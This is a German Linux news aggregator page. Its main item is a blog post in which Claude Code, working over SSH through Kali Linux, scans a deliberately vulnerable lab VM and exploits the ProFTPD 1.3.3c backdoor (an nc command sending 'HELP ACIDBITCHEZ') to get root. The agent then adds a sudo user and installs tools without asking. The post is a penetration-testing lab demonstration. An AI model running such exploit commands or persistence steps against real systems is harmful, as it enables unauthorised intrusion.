💾

Die EU-Kommission will mit ihrer geplanten „European Open Digital Ecosystem Strategy“ die digitale Souveränität der europäischen Verwaltung stärken. Heute wurde die öffentliche Konsultation abgeschlossen, welche die EU-Kommission im Vorfeld dazu durchgeführt hat. Hierbei konnten Einzelpersonen, Verbände und Interessengruppen ihre Einschätzung dazu abgeben, welche Hürden dem gezielten Einsatz von Open Source durch die EU-Kommission derzeit noch im Wege stehen, bzw. wie die Vorzüge von Open Source noch erfolgreicher genutzt werden können.

Quelle

Mit einem selbst entwickelten Bewertungssystem prüft München künftig alle IT-Services auf Abhängigkeiten von Anbietern und Staaten.

OpenClaw, zuvor auch bekannt als Clawdbot beziehungsweise Moltbot ist ein universeller KI-Agent, entwickelt vom Österreicher Peter Steinberger, der Sprachmodelle in persönliche Assistenten…

Sicherheitslücken in Nvidia-Software stellen aktuell ein Risiko für Linux- und Windows-Systeme dar.

Die Rust-Neuimplementierung klassischer Unix-Tools erreicht in Version 0.6 eine GNU-Kompatibilität von 96 Prozent – und reduziert Unsafe-Code.

Mozilla kündigt in einem Blog  an, dass die für den 24.

Damit Mike Schilli sieht, woher die Zugriffe auf seine Website erfolgen, gibt er sie live auf einer interaktiven Weltkarte aus. Im Video erläutert er seine Vorgehensweise.

Moderne KI-Tools zum Agentic Coding können nicht nur programmieren, sie können auch Kommandos ausführen — im einfachsten Fall mit grep in der Code-Basis nach einem Schlüsselwort suchen. Diese Funktionalität geht aber weiter als Sie vielleicht denken: Einen SSH-Account mit Key-Authentifizierung vorausgesetzt, kann das KI-Tool auch Kommandos auf externen Rechnern ausführen! Das gibt wiederum weitreichende Möglichkeiten, sei es zu Administration von Linux-Rechner, sei es zur Durchführung von Hacking- oder Penetration-Testing-Aufgaben. In diesem Beitrag illustriere ich anhand eines Beispiels das sich daraus ergebende Potenzial.

Entgegen landläufiger Meinung brauchen Sie zum Hacking per KI keinen MCP-Server! Ja, es gibt diverse MCP-Server, mit denen Sie bash- oder SSH-Kommandos ausführen bzw. Hacking-Tools steuern können, z.B. ssh-mcp, mcp-kali-server oder hexstrike-ai. Aber sofern Ihr KI-Tool sowieso Kommandos via SSH ausführen kann, bieten derartige MCP-Server wenig nennenswerte Vorteile.

Setup

Als Ausgangspunkt für dieses Beispiel dient ein KI-Tool mit CLI (Command Line Interface), z.B. Claude Code, Codex CLI, Gemini CLI oder GitHub Copilot CLI. Ebenso geeignet sind Open-Source-Tools wie Aider oder Goose, die mit einem lokalen Sprachmodell verbunden werden können.

Ich habe für meine Tests Claude Code auf einem Linux-Rechner (Fedora) installiert. Claude Code erfordert ein Claude-Abo oder einen API-Zugang bei Anthropic.

Außerdem habe ich zwei virtuelle Maschinen eingerichtet (siehe den obigen Screenshot). Dort läuft einerseits Kali Linux (Hostname kali) und andererseits Basic Pentesting 1 (Hostname vtcsec). Basic Pentesting 1 ist ein in der Security-Ausbildung beliebtes System mit mehreren präparierten Sicherheitslücken.

Für das Netzworking habe ich der Einfachheit halber beide virtuellen Maschinen einer Bridge zugeordnet, so dass sich diese quasi im lokalen Netzwerk befinden. Sicherheitstechnisch für diese Art von Tests wäre es vernünftiger, Kali Linux zwei Netzwerkadapter zuzuweisen, einen für den Zugang zum Hostrechner (Fedora) und einen zweiten für ein internes Netzwerk. Das Target-System (hier Basic Pentesting 1) bekommt nur Zugang zum internen Netzwerk. Damit kann Kali Linux mit dem Target-System kommunizieren, aber es gibt keine Netzwerkverbindung zwischen dem Target-System und dem Host-Rechner oder dem lokalen Netzwerk.

In Kali Linux habe ich den Benutzer aiadmin eingerichtet. Dieser darf per sudo alle Kommandos ohne Passwort ausführen:

# in /etc/sudoers auf Kali Linux
aiadmin ALL=(ALL) NOPASSWD: ALL

Auf dem lokalen Rechner (Fedora) kümmert sich .ssh/config darum, dass aiadmin der Default-User für SSH-Verbindungen ist.

# Datei .ssh/config auf dem lokalen Rechner
Host kali
  User aiadmin

Damit der SSH-Login bei Kali Linux ohne Passwort funktioniert, habe ich einen SSH-Key eingerichtet:

fedora$ ssh-copy-id aiadmin@kali

Sobald das funktioniert, habe ich den interaktiven Login für aiadmin gesperrt (Option -l wie lock).

kali$ sudo passwd -l aiadmin

Der privilegierte Benutzer aiadmin kann jetzt also NUR noch per SSH-Key-Login genutzt werden.

Alternatives Setup Bei diesem Setup gibt es eine logische Barriere zwischen unserem Arbeitsrechner mit diversen Entwickler- und KI-Tools und Kali Linux. Wenn Sie im Security-Umfeld arbeiten, ist es naheliegen, Claude Code oder ein anderes KI-Tool direkt in Kali Linux zu installieren und so den SSH-Umweg einzusparen.

Setup testen

Nun richten Sie ein leeres Projektverzeichnis ein, wechseln dorthin und starten claude. Die beiden ersten Prompts dienen dazu, Claude das Testumfeld zu erklären und dieses auszuprobieren.

> There is a Kali Linux installation with hostname kali. 
  Try to connect via SSH. (OK ...)

> Kali can connect to host vtcsec. This is a VM designated 
  for penetration testing. ping to it! (OK ...)

AI Assisted Hacking

Im dritten Prompt geht es richtig los. Claude soll in Kali Linux einen Port Scan für das Pentesting-System durchführen. Dort findet es eine veraltete ProFTPD-Version mit einer bekannten Sicherheitslücke.

> Now do a proper port scan for vtcsec. Find out what 
  software is running.


  (...) Here's what's running on vtcsec:

  Port  Service  Version
  21    FTP      ProFTPD 1.3.3c
  22    SSH      OpenSSH 7.2p2 (Ubuntu)
  80    HTTP     Apache 2.4.18 (Ubuntu)

  OS: Linux 3.x/4.x (Ubuntu), running as a QEMU VM.

  Notable observations:

  - ProFTPD 1.3.3c is a notably old version with 
    known vulnerabilities (including a backdoor in 
    certain distributions).
  - OpenSSH 7.2p2 and Apache 2.4.18 are also outdated versions with known CVEs.
  - Only 3 ports open, 997 closed — a fairly minimal attack surface.

> Find exploits for ProFTPD.

  (...) Here are the exploits found for ProFTPD 1.3.3:

  Exploit
  ProFTPd 1.3.2rc3 < 1.3.3b (FreeBSD) Telnet IAC Buffer Overflow
  ProFTPd 1.3.2rc3 < 1.3.3b (Linux) - Telnet IAC Buffer Overflow
  ProFTPd 1.3.3c - Compromised Source Backdoor
  ProFTPd IAC 1.3.x - Remote Command Execution
  ProFTPd 1.3.3c - Backdoor Command Execution (Metasploit)

  The most relevant one is the backdoor in ProFTPD 1.3.3c - 
  this is the infamous incident where the ProFTPD source code
  was compromised, and a backdoor was inserted. It allows remote 
  command execution by sending HELP ACIDBITCHEZ to the FTP service. 
  There's both a manual exploit and a Metasploit module available.

  Want me to try the backdoor exploit against vtcsec?

Wir wollen nun die gefundene Backdoor nutzen. Der erste Exploit-Versuch scheitert, aber bereits im zweiten Versuch kann Claude die Backdoor in ProFTPD ausnutzen und erreicht root-Rechte.

> Yes, try it!

  Bash(ssh kali "searchsploit -x linux/remote/15662.txt")
  Exploit: ProFTPd 1.3.3c - Compromised Source Backdoor 
                            Remote Code Execution
  URL:  https://www.exploit-db.com/exploits/15662
  Path: /usr/share/exploitdb/exploits/linux/remote/15662.txt

  Bash(ssh kali 'echo -e "HELP ACIDBITCHEZ\nid\nhostname
               \nuname -a\nexit\n" | nc -w 5 vtcsec 21')

  The simple netcat approach didn't return command output. 
  Let me try with a proper interactive approach using Metasploit 
  or a Python script.

  Bash(ssh kali 'python3 -c " ..." ')
  Banner: 220 ProFTPD 1.3.3c Server (vtcsec) [192.168.178.48]
  Response: uid=0(root) gid=0(root) groups=0(root)...
  Response: vtcsec
  Response: Linux vtcsec 4.10.0-28-generic

  The backdoor exploit worked. Here's what we got:

  - Access level: uid=0(root) — full root access
  - Hostname: vtcsec
  - Kernel: Linux 4.10.0-28-generic (Ubuntu 16.04)

  The HELP ACIDBITCHEZ backdoor in ProFTPD 1.3.3c gave an unauthenticated
  remote root shell with zero effort — no credentials, no authentication, 
  just a single FTP command.  Want me to explore the system further or move 
  on to testing the other services?

Mit den nun erworbenen root-Rechten soll Claude einen neuen Benutzer mit sudo-Rechten einzurichten. Wiederum scheitert der erste Versuch, weil das Kommando sshpass auf Kali Linux nicht installiert ist. Claude lässt sich davon nicht beirren: Ohne weitere Rückfragen installiert es das fehlende Kommando, richtet den neuen Benutzer ein und verifiziert dessen Funktionsweise. Grandios!

Anmerkungen

Bemerkenswert an diesem Beispiel ist, dass ich Claude nie mitgeteilt habe, wie es vorgehen soll bzw. mit welchen Hacking-Tool es arbeiten soll. Claude hat selbstständig den Port-Scan mit nmap durchgeführt, mit metasploit nach einem Exploit gesucht und diesen angewendet.

Auch wenn das obige Beispiel einen erfolgreichen Einbruch skizziert, wird Hacking mit KI-Unterstützung nicht automatisch zum Kinderspiel. Hier habe ich die Richtung vorgegeben. Wenn Sie dem KI-Tool freie Hand lassen (Prompt: »Get me root access on vtcsec«), führt es den Portscan möglicherweise zuwenig gründlich durch und übersieht den ProFTPD-Server, der in diesem Fall beinahe eine Einladung zum Hacking darstellt. Stattdessen konzentriert sich das Tool darauf, SSH-Logins zu erraten oder Fehler in der Konfiguration des Webservers zu suchen. Das sind zeitaufwändige Prozesse mit nur mäßiger Erfolgswahrscheinlichkeit.

Fakt bleibt, dass die KI-Unterstützung den Zeitaufwand für Penetration Tester erheblich senken kann — z.B. wenn es darum geht, mehrere Server gleichzeitig zu überprüfen. Umgekehrt macht die KI das Hacking für sogenannte »Script Kiddies« leichter denn je. Das ist keine erfreuliche Perspektive …

Quellen, Links

• https://claude.com/product/claude-code
• https://www.kali.org
• https://www.vulnhub.com/entry/basic-pentesting-1,216/

MCP-Server (optional für KI-Tools, die keinen direkten Kommandoaufruf ermöglichen)

• https://github.com/tufantunc/ssh-mcp
• https://www.kali.org/tools/mcp-kali-server
• https://github.com/0x4m4/hexstrike-ai

Das deutsche Bundesministerium für Forschung, Raumfahrt und Technologie (BMFTR) fördert das Projekt AALearning, das maschinelles Lernen in physikalischen Anwendungen besser, sicherer und…

Mit Tails 7.4.1 schließen die Entwickler der Anonymisierungssoftware unter anderem eine kritische Sicherheitslücke in OpenSSL, der von Tor verwendeten Netzwerkverschlüsselungsbibliothek.

Wer eine Datei speichern möchte, wird manchmal von seltsamem Verhalten oder komischen Dialogen überrascht. Hier sind zwei Beispiele.

Die Raspberry Pi Foundation gibt weitere Preiserhöhungen für viele ihrer Produkte bekannt. Der Grund sind die weiter steigenden Preise für Consumer-RAM an den Weltmärkten.

Im openSUSE Projekt beginnt eine neue Debatte über die künftige Organisation der Gemeinschaft. Jeff Mahoney, VP of Engineering for Linux Systems bei SUSE, hat einen Entwurf vorgestellt, der helfen soll, Entscheidungen in dem stetig wachsenden Umfeld besser zu strukturieren und nachvollziehbarer zu machen. Der Vorschlag versteht sich als Grundlage für Gespräche und ändert keine bestehenden […]

Der Beitrag openSUSE diskutiert neuen Entscheidungsprozess erschien zuerst auf fosstopia.

Linux From Scratch wird die Unterstützung für SysVinit mit Version 13.0 ab März 2026 aufgeben. Die Gründe sind zu hohe Arbeitsbelastung und zunehmende Dominanz von systemd.

Die KI-Funktionen in Firefox lassen sich ab der nächsten Version mit einem Knopf vollständig ausknipsen. (Firefox, Browser)

Die Fedikarte lebt! Unter Fedimap.de könnt ihr euren Standort eintragen und Gleichgesinnte in eurer Nähe finden.

Eine fraktionsübergreifende Parlamentskommission will die Abhängigkeit von US-Tech-Giganten beenden und verstärkt auf europäische Open-Source-Lösungen setzen.

Die Open-Source-Konferenz der Superlative wird politischer. Denn: Wenn die Demokratie verschwinde, verschwinde auch Open Source. (Open Source, Softwareentwicklung)

Forscher des MIT haben mit DiffSyn ein neues KI-Modell geschaffen, dass den besten Weg für die Herstellung neuer Materialien mit bestimmten Eigenschaften vorschlagen soll.

Elon Musk hat bei der amerikanischen Behörde FCC ( Federal Communications Commission) einen Antrag auf Zulassung einer Satelliten-Konstellation mit bis zu einer Million Satelliten beantragt.

Zum ersten Mal hat Ende letzten Jahres Anthropics KI-Modell Claude ein Fahrzeug auf einem anderen Planeten gesteuert.

Die unaufhaltsam steigenden Speicherpreise erreichen erneut den eigentlich günstigen Raspberry Pi. Dessen Hersteller sieht sich gezwungen, die Preise noch einmal anzuziehen.

Die unaufhaltsam steigenden Speicherpreise erreichen erneut den eigentlich günstigen Raspberry Pi. Dessen Hersteller sieht sich gezwungen, die Preise noch einmal anzuziehen.

Die Free Software Foundation Schweiz feiert bereits am 12. Februar den I Love Free Software Day in Zürich mit vier Vorträgen, guter Stimmung und Pizza. Komm vorbei!